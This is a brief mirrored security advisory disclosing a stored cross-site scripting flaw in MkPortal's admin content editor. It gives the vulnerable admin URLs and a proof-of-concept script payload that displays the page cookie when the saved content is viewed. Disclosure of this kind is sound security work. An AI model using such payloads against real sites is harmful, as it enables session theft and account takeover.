Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15608
HistoryJan 06, 2007 - 12:00 a.m.

MkPortal Admin XSS

2007-01-0600:00:00
vulners.com
18
JSON

MkPortal Admin XSS

Discovered by: Demential
Web: http://headburn.altervista.org
E-mail: info[at]burnhead[dot]it
Mkportal website: http://www.mkportal.it

Go to: /mkportal/admin.php?ind=ad_contents&op=contents_new

In both fields write:
"><script>alert(document.cookie)</script>
and press save.

Alert will appear here: /mkportal/admin.php?ind=ad_contents
and here: /mkportal/admin.php?ind=ad_contents&op=contents_edit&idc=*
where * is the ID of the page.

JSON